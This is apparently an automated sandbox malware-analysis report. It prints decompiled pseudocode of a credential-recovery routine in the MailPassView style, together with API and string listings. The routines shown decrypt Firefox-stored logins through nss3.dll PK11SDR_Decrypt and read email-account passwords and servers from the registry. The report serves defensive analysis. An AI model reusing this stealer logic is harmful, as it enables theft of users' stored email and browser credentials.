                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				 *(_t208 - 4) = 2;
                                                                                				 *_t208 = 0x9c48;
                                                                                				 *((char*)(_t208 + 4)) = 4;
                                                                                				 *((char*)(_t208 + 5)) = 0;
                                                                                				 *((char*)(_t208 + 6)) = 0;
                                                                                				 *((char*)(_t208 + 7)) = 0;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				 *((intOrPtr*)(_t208 + 0x10)) = 3;
                                                                                				 *((intOrPtr*)(_t208 + 0x14)) = 0x9c49;
                                                                                				 *((char*)(_t208 + 0x18)) = 4;
                                                                                				 *((char*)(_t208 + 0x19)) = 0;
                                                                                				 *((char*)(_t208 + 0x1a)) = 0;
                                                                                				 *((char*)(_t208 + 0x1b)) = 0;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				 *((intOrPtr*)(_t208 + 0x24)) = 0;
                                                                                				 *((intOrPtr*)(_t208 + 0x28)) = 0x9c4e;
                                                                                				 *((char*)(_t208 + 0x2c)) = 4;
                                                                                				 *((char*)(_t208 + 0x2d)) = 0;
                                                                                				 *((char*)(_t208 + 0x2e)) = 0;
                                                                                				 *((char*)(_t208 + 0x2f)) = 0;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				 *((intOrPtr*)(_t208 + 0x38)) = 6;
                                                                                				 *((intOrPtr*)(_t208 + 0x3c)) = 0x9c56;
                                                                                				 *((char*)(_t208 + 0x40)) = 4;
                                                                                				 *((char*)(_t208 + 0x41)) = 0;
                                                                                				 *((char*)(_t208 + 0x42)) = 0;
                                                                                				 *((char*)(_t208 + 0x43)) = 0;
                                                                                				asm("stosd");
                                                                                				asm("stosd");
                                                                                				 *((intOrPtr*)(_t208 + 0x4c)) = 4;
                                                                                				 *((intOrPtr*)(_t208 + 0x50)) = 0x9c42;
                                                                                				 *((char*)(_t208 + 0x54)) = 4;
                                                                                				 *((char*)(_t208 + 0x55)) = 0;
                                                                                				 *((char*)(_t208 + 0x56)) = 0;
                                                                                				 *((char*)(_t208 + 0x57)) = 0;
                                                                                				 *(_t208 + 0x6c) =  *(_t208 + 0x6c) | 0xffffffff;
                                                                                				asm("stosd");
                                                                                				_t198 = 0x66;
                                                                                				asm("stosd");
                                                                                				_t121 = E00407BB9(_t198);
                                                                                				_t194 =  *((intOrPtr*)(_t208 + 0x70));
                                                                                				 *(_t194 + 0x11c) = _t121;
                                                                                				_t122 = SetMenu( *(_t194 + 0x108), _t121);
                                                                                				__imp__#6(0x50000000, 0x412466,  *(_t194 + 0x108), 0x101, _t185, _t197, _t166);
                                                                                				 *(_t194 + 0x114) = _t122;
                                                                                				SendMessageA(_t122, 0x404, 1, _t208 + 0x6c);
                                                                                				 *((intOrPtr*)(_t194 + 0x118)) = CreateToolbarEx( *(_t194 + 0x108), 0x50010900, 0x102, 7, 0, LoadImageA( *0x416b94, 0x68, 0, 0, 0, 0x9060), _t208 - 0x40, 8, 0x10, 0x10, 0x70, 0x10, 0x14);
                                                                                				E004023D4( *((intOrPtr*)(_t194 + 0x370)), _t213, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t194 + 0x108), 0x103,  *0x416b94, 0), 1);
                                                                                				_t128 =  *((intOrPtr*)(_t194 + 0x370));
                                                                                				_t173 =  *((intOrPtr*)(_t128 + 0x1b0));
                                                                                				_t200 =  *((intOrPtr*)(_t128 + 0x1b4));
                                                                                				 *((intOrPtr*)(_t208 + 0x68)) =  *((intOrPtr*)(_t128 + 0x184));
                                                                                				if(_t173 <= 0) {
                                                                                					L3:
                                                                                					_t201 =  *((intOrPtr*)(_t194 + 0x370));
                                                                                					E00409EC4(_t201);
                                                                                					_t133 = ImageList_ReplaceIcon( *(_t201 + 0x18c), 0, LoadIconA( *0x416b94, 0x66));
                                                                                					if( *((intOrPtr*)(_t201 + 0x1b8)) != 0) {
                                                                                						E00409E32(_t133, _t173, _t194, _t201);
                                                                                					}
                                                                                					_t202 = 0x68;
                                                                                					 *((intOrPtr*)(_t194 + 0x154)) = E00407BB9(_t202);
                                                                                					_t135 =  *((intOrPtr*)(_t194 + 0x37c));
                                                                                					if( *((intOrPtr*)(_t135 + 0x30)) <= 0) {
                                                                                						_t174 = 0x412466;
                                                                                					} else {
                                                                                						if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
                                                                                							_t174 = 0;
                                                                                						} else {
                                                                                							_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0xc)))) +  *((intOrPtr*)(_t135 + 0x10));
                                                                                						}
                                                                                					}
                                                                                					_push("/noloadsettings");
                                                                                					_push(_t174);
                                                                                					L004115B2();
                                                                                					if(_t135 == 0) {
                                                                                						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
                                                                                					}
                                                                                					E0040AF17(_t194, 0);
                                                                                					 *( *(_t194 + 0x36c)) = 1;
                                                                                					SetFocus( *( *((intOrPtr*)(_t194 + 0x370)) + 0x184));
                                                                                					if( *0x417660 == 0) {
                                                                                						E00406172(0x417660);
                                                                                						if((GetFileAttributesA(0x417660) & 0x00000001) != 0) {
                                                                                							GetTempPathA(0x104, 0x417660);
                                                                                						}
                                                                                					}
                                                                                					_t204 = strlen(0x417660);
                                                                                					 *_t211 = "report.html";
                                                                                					_t99 = strlen(??) + 1; // 0x1
                                                                                					_t223 = _t204 + _t99 - 0x104;
                                                                                					if(_t204 + _t99 >= 0x104) {
                                                                                						 *((char*)(_t194 + 0x264)) = 0;
                                                                                					} else {
                                                                                						E004062AD(_t194 + 0x264, 0x417660, "report.html");
                                                                                					}
                                                                                					_push(1);
                                                                                					_t178 = 0x30;
                                                                                					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), _t178);
                                                                                					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), 1, ( *(_t194 + 0x36c))[1]);
                                                                                					_t149 = RegisterWindowMessageA("commdlg_FindReplace");
                                                                                					_t205 = _t194;
                                                                                					 *(_t194 + 0x374) = _t149;
                                                                                					E0040A27F(0, 1, _t205, _t223);
                                                                                					E00401E8B(_t223,  *((intOrPtr*)(_t205 + 0x370)) + 0xb20);
                                                                                					 *(_t208 + 0x60) = 0x12c;
                                                                                					 *((intOrPtr*)(_t208 + 0x64)) = 0x400;
                                                                                					SendMessageA( *(_t205 + 0x114), 0x404, 2, _t208 + 0x60);
                                                                                					return SendMessageA( *(_t205 + 0x114), 0x401, 0x1001, 0);
                                                                                				} else {
                                                                                					_t207 = _t200 + 0xc;
                                                                                					 *((intOrPtr*)(_t208 + 0x74)) = _t173;
                                                                                					do {
                                                                                						_t173 =  *((intOrPtr*)(_t207 - 8));
                                                                                						E00404925( *((intOrPtr*)(_t207 + 4)),  *((intOrPtr*)(_t207 - 8)),  *((intOrPtr*)(_t208 + 0x68)),  *((intOrPtr*)(_t207 - 0xc)),  *((intOrPtr*)(_t207 - 4)),  *_t207);
                                                                                						_t211 = _t211 + 0x10;
                                                                                						_t207 = _t207 + 0x14;
                                                                                						_t82 = _t208 + 0x74;
                                                                                						 *_t82 =  *((intOrPtr*)(_t208 + 0x74)) - 1;
                                                                                					} while ( *_t82 != 0);
                                                                                					goto L3;
                                                                                				}
                                                                                			}






























                                                                                APIs
                                                                                  • Part of subcall function 00407BB9: LoadMenuA.USER32 ref: 00407BC1
                                                                                  • Part of subcall function 00407BB9: sprintf.MSVCRT ref: 00407BE4
                                                                                • SetMenu.USER32(?,00000000), ref: 0040A8A7
                                                                                • #6.COMCTL32(50000000,Function_00012466,?,00000101), ref: 0040A8C2
                                                                                • SendMessageA.USER32 ref: 0040A8DA
                                                                                • LoadImageA.USER32 ref: 0040A8F0
                                                                                • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040A91A
                                                                                • CreateWindowExA.USER32 ref: 0040A950
                                                                                • LoadIconA.USER32(00000066,00000000), ref: 0040A9BF
                                                                                • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9CD
                                                                                • _stricmp.MSVCRT(Function_00012466,/noloadsettings), ref: 0040AA17
                                                                                • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MailPassView), ref: 0040AA2C
                                                                                • SetFocus.USER32(?,00000000), ref: 0040AA52
                                                                                • GetFileAttributesA.KERNEL32(00417660), ref: 0040AA6B
                                                                                • GetTempPathA.KERNEL32(00000104,00417660), ref: 0040AA7B
                                                                                • strlen.MSVCRT ref: 0040AA82
                                                                                • strlen.MSVCRT ref: 0040AA90
                                                                                • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AAEC
                                                                                  • Part of subcall function 00404925: strlen.MSVCRT ref: 00404942
                                                                                  • Part of subcall function 00404925: SendMessageA.USER32 ref: 00404966
                                                                                • SendMessageA.USER32 ref: 0040AB37
                                                                                • SendMessageA.USER32 ref: 0040AB4A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
                                                                                • String ID: /noloadsettings$Software\NirSoft\MailPassView$SysListView32$`vA$commdlg_FindReplace$report.html
                                                                                • API String ID: 873469642-860065374
                                                                                • Opcode ID: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                                                • Instruction ID: ca2bded9840d9beafebaacef77bacb5142d556b3fd29cdc4ce09694084a06bb6
                                                                                • Opcode Fuzzy Hash: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                                                • Instruction Fuzzy Hash: 82B12271644388FFEB16CF74CC45BDABBA5BF14304F00406AFA44A7292C7B5A954CB5A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E0040DB39(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, void _a10, unsigned int _a12, void _a264, void _a265, void _a520, void _a521, void _a776, void _a780, char _a784, char _a1056, void _a1057, char _a2080, void _a2081, char _a3104, void _a3105) {
                                                                                				char _v0;
                                                                                				struct HWND__* _v4;
                                                                                				void* __edi;
                                                                                				void* _t44;
                                                                                				void* _t58;
                                                                                				int _t59;
                                                                                				int _t61;
                                                                                				int _t62;
                                                                                				long _t66;
                                                                                				struct HWND__* _t93;
                                                                                				intOrPtr _t122;
                                                                                				unsigned int _t125;
                                                                                				signed int _t127;
                                                                                				signed int _t128;
                                                                                				void* _t134;
                                                                                
                                                                                				_t128 = _t127 & 0xfffffff8;
                                                                                				E004118A0(0x1424, __ecx);
                                                                                				_t44 = _a8 - 0x110;
                                                                                				if(_t44 == 0) {
                                                                                					E00406491(__edx, _a4);
                                                                                					 *_t128 = 0x7ff;
                                                                                					_a3104 = 0;
                                                                                					memset( &_a3105, 0, ??);
                                                                                					asm("movsd");
                                                                                					asm("movsd");
                                                                                					asm("movsw");
                                                                                					memset( &_a10, 0, 0xfb);
                                                                                					_a520 = 0;
                                                                                					memset( &_a521, 0, 0xff);
                                                                                					_a264 = 0;
                                                                                					memset( &_a265, 0, 0xff);
                                                                                					_a1056 = 0;
                                                                                					memset( &_a1057, 0, 0x3ff);
                                                                                					_a2080 = 0;
                                                                                					memset( &_a2081, 0, 0x3ff);
                                                                                					_t134 = _t128 + 0x48;
                                                                                					_t58 = GetCurrentProcess();
                                                                                					_t102 =  &_a520;
                                                                                					_v4 = _t58;
                                                                                					_t59 = ReadProcessMemory(_t58,  *0x416c64,  &_a520, 0x80, 0);
                                                                                					__eflags = _t59;
                                                                                					if(_t59 != 0) {
                                                                                						E00406585( &_a1056,  &_a520, 4);
                                                                                						_pop(_t102);
                                                                                					}
                                                                                					_t61 = ReadProcessMemory(_v4,  *0x416c58,  &_a264, 0x80, 0);
                                                                                					__eflags = _t61;
                                                                                					if(_t61 != 0) {
                                                                                						E00406585( &_a2080,  &_a264, 0);
                                                                                						_pop(_t102);
                                                                                					}
                                                                                					_t62 = E0040629C();
                                                                                					__eflags = _t62;
                                                                                					if(_t62 == 0) {
                                                                                						E0040E056();
                                                                                					} else {
                                                                                						E0040E0DA();
                                                                                					}
                                                                                					__eflags =  *0x417514;
                                                                                					if(__eflags != 0) {
                                                                                						L17:
                                                                                						_a776 = 0;
                                                                                						memset( &_a780, 0, 0x114);
                                                                                						_t122 =  *0x416e7c; // 0x0
                                                                                						_t134 = _t134 + 0xc;
                                                                                						_t66 = GetCurrentProcessId();
                                                                                						 *0x417108 = 0;
                                                                                						E0040E255(_t102, __eflags, _t66, _t122);
                                                                                						__eflags =  *0x417108;
                                                                                						if( *0x417108 != 0) {
                                                                                							memcpy( &_a776, 0x416ff0, 0x118);
                                                                                							_t134 = _t134 + 0xc;
                                                                                							__eflags =  *0x417108;
                                                                                							if( *0x417108 != 0) {
                                                                                								strcpy( &_v0, E004061E6( &_a784));
                                                                                							}
                                                                                						}
                                                                                						goto L20;
                                                                                					} else {
                                                                                						__eflags =  *0x417518;
                                                                                						if(__eflags == 0) {
                                                                                							L20:
                                                                                							sprintf( &_a3104, "Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n",  *0x416e70,  *0x416e7c,  &_v0,  *0x416c50,  *0x416c44,  *0x416c4c,  *0x416c48,  *0x416c40,  *0x416c3c,  *0x416c54,  *0x416c64,  *0x416c58,  &_a1056,  &_a2080);
                                                                                							SetDlgItemTextA(_a4, 0x3ea,  &_a3104);
                                                                                							SetFocus(GetDlgItem(_a4, 0x3ea));
                                                                                							L21:
                                                                                							return 0;
                                                                                						}
                                                                                						goto L17;
                                                                                					}
                                                                                				}
                                                                                				if(_t44 == 1) {
                                                                                					_t125 = _a12;
                                                                                					if(_t125 >> 0x10 == 0) {
                                                                                						if(_t125 == 3) {
                                                                                							_t93 = GetDlgItem(_a4, 0x3ea);
                                                                                							_v4 = _t93;
                                                                                							SendMessageA(_t93, 0xb1, 0, 0xffff);
                                                                                							SendMessageA(_v4, 0x301, 0, 0);
                                                                                							SendMessageA(_v4, 0xb1, 0, 0);
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				goto L21;
                                                                                			}



















                                                                                APIs
                                                                                Strings
                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040DE02
                                                                                • {Unknown}, xrefs: 0040DBFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                • API String ID: 138940113-3474136107
                                                                                • Opcode ID: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                                                • Instruction ID: 36e6f19d437acde9dae1843bd1f228cb1d7049f577ea92cd8b51c55dddb48a69
                                                                                • Opcode Fuzzy Hash: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                                                • Instruction Fuzzy Hash: 6D711C72844244BFD721EF51DC41EEB3BEDEF94344F00843EF649921A0DA399A58CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040DEEE(struct HINSTANCE__** __esi, intOrPtr _a4) {
                                                                                				void _v267;
                                                                                				char _v268;
                                                                                				void _v531;
                                                                                				char _v532;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				int _t39;
                                                                                				void* _t44;
                                                                                				struct HINSTANCE__* _t53;
                                                                                				struct HINSTANCE__* _t56;
                                                                                				struct HINSTANCE__** _t69;
                                                                                
                                                                                				_t69 = __esi;
                                                                                				_v268 = 0;
                                                                                				memset( &_v267, 0, 0x104);
                                                                                				if(_a4 != 0) {
                                                                                					E004060D0(0x104,  &_v268, _a4);
                                                                                				}
                                                                                				if(_v268 != 0) {
                                                                                					GetCurrentDirectoryA(0x104,  &(_t69[8]));
                                                                                					SetCurrentDirectoryA( &_v268);
                                                                                					_v532 = 0;
                                                                                					memset( &_v531, 0, 0x104);
                                                                                					_t39 = strlen("nss3.dll");
                                                                                					_t13 = strlen( &_v268) + 1; // 0x1
                                                                                					if(_t39 + _t13 >= 0x104) {
                                                                                						_v532 = 0;
                                                                                					} else {
                                                                                						E004062AD( &_v532,  &_v268, "nss3.dll");
                                                                                					}
                                                                                					_t44 = GetModuleHandleA( &_v532);
                                                                                					 *_t69 = _t44;
                                                                                					if(_t44 != 0) {
                                                                                						L9:
                                                                                						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
                                                                                						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
                                                                                						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
                                                                                						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
                                                                                						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
                                                                                						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
                                                                                						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
                                                                                					} else {
                                                                                						_t53 = LoadLibraryExA( &_v532, _t44, 8);
                                                                                						 *_t69 = _t53;
                                                                                						if(_t53 != 0) {
                                                                                							goto L9;
                                                                                						} else {
                                                                                							E0040DEA9();
                                                                                							_t56 = LoadLibraryExA( &_v532, 0, 8);
                                                                                							 *_t69 = _t56;
                                                                                							if(_t56 != 0) {
                                                                                								goto L9;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return 0 |  *_t69 != 0x00000000;
                                                                                			}















                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040DF0F
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                                                • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                                                • memset.MSVCRT ref: 0040DF62
                                                                                • strlen.MSVCRT ref: 0040DF6C
                                                                                • strlen.MSVCRT ref: 0040DF7A
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                                                • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                                                • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                                                • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                                                • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
                                                                                • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E020
                                                                                • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E02C
                                                                                • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E038
                                                                                • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E044
                                                                                  • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                  • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                                                                                • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                • API String ID: 1296682400-4029219660
                                                                                • Opcode ID: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                                • Instruction ID: fea3831f464983b0eef39fbf9020f470c327cc413978f8e1f023dd725517e53d
                                                                                • Opcode Fuzzy Hash: bee48e1ba3e59cf5a7585e4159a10cf2e8eb6bd81037002e4d6a425fcc2e4864
                                                                                • Instruction Fuzzy Hash: 2A4187B1940309AACB20AF75CC49FC6BBF8AF64704F10496AE185E2191E7B996D4CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 35%
                                                                                			E00402606(void* __ecx, void* __fp0) {
                                                                                				void* __esi;
                                                                                				void* _t58;
                                                                                				void* _t59;
                                                                                				void* _t67;
                                                                                				void* _t70;
                                                                                				void* _t73;
                                                                                				void* _t87;
                                                                                				signed int _t90;
                                                                                				void* _t92;
                                                                                				signed int _t96;
                                                                                				intOrPtr _t100;
                                                                                				intOrPtr _t101;
                                                                                				void* _t103;
                                                                                				void* _t105;
                                                                                				void* _t106;
                                                                                				void* _t108;
                                                                                				void* _t114;
                                                                                
                                                                                				_t114 = __fp0;
                                                                                				_t92 = __ecx;
                                                                                				_t103 = _t105 - 0x6c;
                                                                                				_t106 = _t105 - 0x474;
                                                                                				 *(_t103 + 0x4c) = "POP3 User Name";
                                                                                				 *(_t103 + 0x50) = "IMAP User Name";
                                                                                				 *(_t103 + 0x54) = "HTTPMail User Name";
                                                                                				 *(_t103 + 0x58) = "SMTP USer Name";
                                                                                				 *(_t103 + 0x1c) = "POP3 Server";
                                                                                				 *(_t103 + 0x20) = "IMAP Server";
                                                                                				 *(_t103 + 0x24) = "HTTPMail Server";
                                                                                				 *(_t103 + 0x28) = "SMTP Server";
                                                                                				 *(_t103 + 0x3c) = "POP3 Password2";
                                                                                				 *(_t103 + 0x40) = "IMAP Password2";
                                                                                				 *(_t103 + 0x44) = "HTTPMail Password2";
                                                                                				 *(_t103 + 0x48) = "SMTP Password2";
                                                                                				 *(_t103 + 0x2c) = "POP3 Port";
                                                                                				 *(_t103 + 0x30) = "IMAP Port";
                                                                                				 *(_t103 + 0x34) = "HTTPMail Port";
                                                                                				 *(_t103 + 0x38) = "SMTP Port";
                                                                                				 *(_t103 + 0x5c) = "POP3 Secure Connection";
                                                                                				 *(_t103 + 0x60) = "IMAP Secure Connection";
                                                                                				 *(_t103 + 0x64) = "HTTPMail Secure Connection";
                                                                                				 *(_t103 + 0x68) = "SMTP Secure Connection";
                                                                                				_t90 = 0;
                                                                                				do {
                                                                                					 *(_t103 - 0x64) = 0;
                                                                                					memset(_t103 - 0x63, 0, 0x7f);
                                                                                					_push(_t103 - 0x64);
                                                                                					_t96 = _t90 << 2;
                                                                                					_push( *((intOrPtr*)(_t103 + _t96 + 0x4c)));
                                                                                					_push( *((intOrPtr*)(_t103 + 0x78)));
                                                                                					_t58 = 0x7f;
                                                                                					_t59 = E0040EB80(_t58, _t92);
                                                                                					_t106 = _t106 + 0x18;
                                                                                					if(_t59 == 0) {
                                                                                						E004021D8(_t103 - 0x408);
                                                                                						strcpy(_t103 - 0x1f4, _t103 - 0x64);
                                                                                						_t100 =  *((intOrPtr*)(_t103 + 0x78));
                                                                                						 *((intOrPtr*)(_t103 - 0x37c)) =  *((intOrPtr*)(_t103 + 0x7c));
                                                                                						_t34 = _t90 + 1; // 0x1
                                                                                						 *((intOrPtr*)(_t103 - 0x1f8)) = _t34;
                                                                                						_push(_t103 - 0x2f8);
                                                                                						_push( *((intOrPtr*)(_t103 + _t96 + 0x1c)));
                                                                                						_push(_t100);
                                                                                						_t67 = 0x7f;
                                                                                						E0040EB80(_t67, _t92);
                                                                                						_push(_t103 - 0x3fc);
                                                                                						_push("SMTP Display Name");
                                                                                						_push(_t100);
                                                                                						_t70 = 0x7f;
                                                                                						E0040EB80(_t70, _t92);
                                                                                						_push(_t103 - 0x378);
                                                                                						_push("SMTP Email Address");
                                                                                						_push(_t100);
                                                                                						_t73 = 0x7f;
                                                                                						E0040EB80(_t73, _t92);
                                                                                						_t108 = _t106 + 0x2c;
                                                                                						if(_t90 != 3) {
                                                                                							_push(_t103 - 0x278);
                                                                                							_push("SMTP Server");
                                                                                							_push(_t100);
                                                                                							_t87 = 0x7f;
                                                                                							E0040EB80(_t87, _t92);
                                                                                							_t108 = _t108 + 0xc;
                                                                                						}
                                                                                						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x2c)), _t103 - 0x74);
                                                                                						E0040EB59(_t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x5c)), _t103 - 0x70);
                                                                                						_t106 = _t108 + 0x18;
                                                                                						_t101 =  *((intOrPtr*)(_t103 + 0x74));
                                                                                						E0040246C(_t101, _t92, _t100,  *((intOrPtr*)(_t103 + _t96 + 0x3c)), _t103 - 0x174, 0);
                                                                                						strcpy(_t103 - 0xf4, _t101 + 0xa9c);
                                                                                						_pop(_t92);
                                                                                						_t59 = E00402407(_t103 - 0x408, _t114, _t101);
                                                                                					}
                                                                                					_t90 = _t90 + 1;
                                                                                				} while (_t90 < 4);
                                                                                				return _t59;
                                                                                			}





















                                                                                APIs
                                                                                • memset.MSVCRT ref: 004026AE
                                                                                  • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                • strcpy.MSVCRT(?,?,?,?,?,73AFED80,?,00000000), ref: 004026EC
                                                                                • strcpy.MSVCRT(?,?), ref: 004027A9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcpy$QueryValuememset
                                                                                • String ID: HTTPMail Password2$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP Password2$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3 Password2$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$SMTP Display Name$SMTP Email Address$SMTP Password2$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                • API String ID: 3373037483-1627711381
                                                                                • Opcode ID: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                                • Instruction ID: d93c2979c5964ee18a3e8d610d8756237e52e0a5809c5516356d8c5187ea57d6
                                                                                • Opcode Fuzzy Hash: 5eb0fa372559596e0b4073e661d7cf54bc2e6271f7b91ab53abef14ebe38c6bd
                                                                                • Instruction Fuzzy Hash: E04186B190021CAADB10DF91DE49ADE37B8EF04348F10446BFD18E7191D3B89699CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 97%
                                                                                			E004027D0(void* __fp0) {
                                                                                				void* __esi;
                                                                                				void* _t66;
                                                                                				signed int _t92;
                                                                                				void* _t95;
                                                                                				intOrPtr _t109;
                                                                                				void* _t111;
                                                                                				void* _t113;
                                                                                				void* _t114;
                                                                                				void* _t121;
                                                                                
                                                                                				_t121 = __fp0;
                                                                                				_t111 = _t113 - 0x70;
                                                                                				_t114 = _t113 - 0x474;
                                                                                				 *(_t111 + 0x40) = "POP3 Password";
                                                                                				 *(_t111 + 0x44) = "IMAP Password";
                                                                                				 *(_t111 + 0x48) = "HTTP Password";
                                                                                				 *(_t111 + 0x4c) = "SMTP Password";
                                                                                				 *(_t111 + 0x50) = "POP3 User";
                                                                                				 *(_t111 + 0x54) = "IMAP User";
                                                                                				 *(_t111 + 0x58) = "HTTP User";
                                                                                				 *(_t111 + 0x5c) = "SMTP User";
                                                                                				 *(_t111 + 0x20) = "POP3 Server";
                                                                                				 *(_t111 + 0x24) = "IMAP Server";
                                                                                				 *(_t111 + 0x28) = "HTTP Server URL";
                                                                                				 *(_t111 + 0x2c) = "SMTP Server";
                                                                                				 *(_t111 + 0x30) = "POP3 Port";
                                                                                				 *(_t111 + 0x34) = "IMAP Port";
                                                                                				 *(_t111 + 0x38) = "HTTP Port";
                                                                                				 *(_t111 + 0x3c) = "SMTP Port";
                                                                                				 *(_t111 + 0x60) = "POP3 Use SPA";
                                                                                				 *(_t111 + 0x64) = "IMAP Use SPA";
                                                                                				 *(_t111 + 0x68) = "HTTPMail Use SSL";
                                                                                				 *(_t111 + 0x6c) = "SMTP Use SSL";
                                                                                				_t92 = 0;
                                                                                				do {
                                                                                					 *(_t111 - 0x60) = 0;
                                                                                					memset(_t111 - 0x5f, 0, 0x7f);
                                                                                					_t114 = _t114 + 0xc;
                                                                                					_t100 = _t92 << 2;
